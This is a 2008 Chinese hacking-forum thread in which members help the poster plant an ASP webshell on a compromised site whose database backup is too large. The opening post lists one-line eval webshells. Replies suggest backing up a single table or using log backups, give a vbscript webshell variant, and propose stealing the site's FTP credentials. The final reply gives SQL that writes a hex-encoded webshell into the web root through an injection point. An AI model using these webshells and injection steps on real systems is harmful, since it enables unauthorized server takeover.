【3.A.S.T】网络安全爱好者 - Powered by Discuz! Board

标题: [讨论]数据库过大导致bak出的小马也太大，从而导致无法连接，有什么好办法？ [打印本页]

作者: 虚竹 时间: 2008-7-21 00:20 标题: [讨论]数据库过大导致bak出的小马也太大，从而导致无法连接，有什么好办法？

[讨论]数据库过大导致bak出的小马也太大，从而导致无法连接，有什么好办法？
文章作者：redbin

信息来源：邪恶八进制信息安全团队（www.eviloctal.com）

数据库过大导致bak出的小马也太大，从而导致无法连接，有什么好办法？

<%eval(request("a")):response.end%>
<%eval(request("a"))%>
<%execute request("a")%>
全部尝试过
用那个结束语句也不可以，每次都drop掉一下新BAK，
测试过BAK成txt 下回来有9M多，改成ASP放自己服务器测试下确实由于过大，而且屏蔽了错误返回信息，从而导致连接不上！不知道各位有什么高见可以让BAK出的小一些呢？小了肯定就可以访问了，或者有什么方法可以能让可以连上即可！

ps:可以列目录但是找不到后台，已经手工测试了那个所谓的后台目录近百个文件！

QQ 35475

作者: lx319 时间: 2008-7-21 00:20

其实不必备份整个数据库的.备份个别的表也行的.具体百度一下吧.鸟大了,什么林子都飞.
帖子12 精华0 积分25 阅读权限40 性别男来自南方在线时间6 小时注册时间2008-4-6 最后登录2008-7-18 查看详细资料引用报告回复 TOP 软件项目外包

miao2
﹎'颓废小猫;

晶莹剔透§烈日灼然

作者: 枫枫 时间: 2008-7-21 00:20

log备份出来的马好象只有70几K
而且原先数据库中不能有 "<%" 字符,不然一样连接不上.
我就记得这些了

帖子26 精华2 积分89 阅读权限40 性别男在线时间102 小时注册时间2007-7-28 最后登录2008-7-19 查看详细资料引用报告回复 TOP 让女孩一夜变的更有女人味

remax

晶莹剔透§烈日灼然

作者: dahuzi3938 时间: 2008-7-21 00:20

差异。

备份。20字节够写什么？

帖子325 精华2 积分911 阅读权限50 在线时间79 小时注册时间2005-10-25 最后登录2008-7-13 查看个人网站
查看详细资料引用报告回复 TOP

小胖子
Calm

晶莹剔透§烈日灼然

作者: isuzu12626 时间: 2008-7-21 00:20

看一下可不可以跨库，备份别的库试一下。上次我上网查资料，突然弹出来一个网页，很黄很暴力，我赶紧给关了。

帖子191 精华2 积分494 阅读权限40 性别男在线时间87 小时注册时间2005-1-18 最后登录2008-7-20 查看详细资料引用报告回复 TOP 少女暴富的隐秘（图）

blackpather

晶莹剔透§烈日灼然

作者: n煲 时间: 2008-7-21 00:20

貌似碰到过这样的问题， “屏蔽了错误返回信息”这个在服务器上是他自己自定义错误。
“可以列目录但是找不到后台” 好像是把后台删了，他自己机登陆后台管理时再FTP上传。
看他用的DD 是开源的不？运气好的话把FTP 密码搞过来，替他上传后台文件。。。
那点不对请批评指正。。。越狱出来滴！

帖子8 精华0 积分33 阅读权限40 性别男来自河南在线时间25 小时注册时间2007-5-29 最后登录2008-7-11 查看个人网站
查看详细资料引用报告回复 TOP 良辰择日，预测咨询，公司改名，权威易经

゛小︷帅！﹊

晶莹剔透§烈日灼然

作者: 旧化王 时间: 2008-7-21 00:20

NBSI快多了。

%%被过滤的时候考虑下 <script language=vbscript runat=server>execute request("#")</script>

帖子58 精华0 积分155 阅读权限40 来自杭州在线时间152 小时注册时间2007-9-29 最后登录2008-7-16 查看个人网站
查看详细资料引用报告回复 TOP 让女孩一夜变的更有女人味

poc

晶莹剔透§烈日灼然

作者: pat1110 时间: 2008-7-21 00:20

你们回复只有一个同学说到了点
备份一个表
其他的也不看看楼主是什么人
汗！
帖子31 精华0 积分90 阅读权限40 性别男在线时间57 小时注册时间2007-3-18 最后登录2008-7-17 查看详细资料引用报告回复 TOP

outstand

晶莹剔透§烈日灼然

作者: win 时间: 2008-7-21 00:20

导出一个表看看效果！
帖子5 精华0 积分6 阅读权限40 在线时间5 小时注册时间2008-5-6 最后登录2008-5-27 查看详细资料引用报告回复 TOP

kof2008

晶莹剔透§烈日灼然

作者: XYFHID 时间: 2008-7-21 00:20

Create TABLE a (cmd text NOT NULL);
Insert INTO a (cmd) VALUES(0x3C25657865637574652872657175657374282261222929253EDA);
select cmd from a into outfile 'X:\WEB\1.asp';
Drop TABLE IF EXISTS a;
0x3C25657865637574652872657175657374282261222929253EDA是LAKE的一句话,密码为a
在PHP环境里我成功过,不知道ASP怎么样
MS在注入点后执行的话要加个;
如果是字符型的话还要加多个点'

帖子2 精华0 积分7 阅读权限40 性别男在线时间2 小时注册时间2006-8-28 最后登录2008-6-8 查看详细资料引用报告回复 TOP

jacksatan

晶莹剔透§烈日灼然

欢迎光临【3.A.S.T】网络安全爱好者 (http://3ast.com/)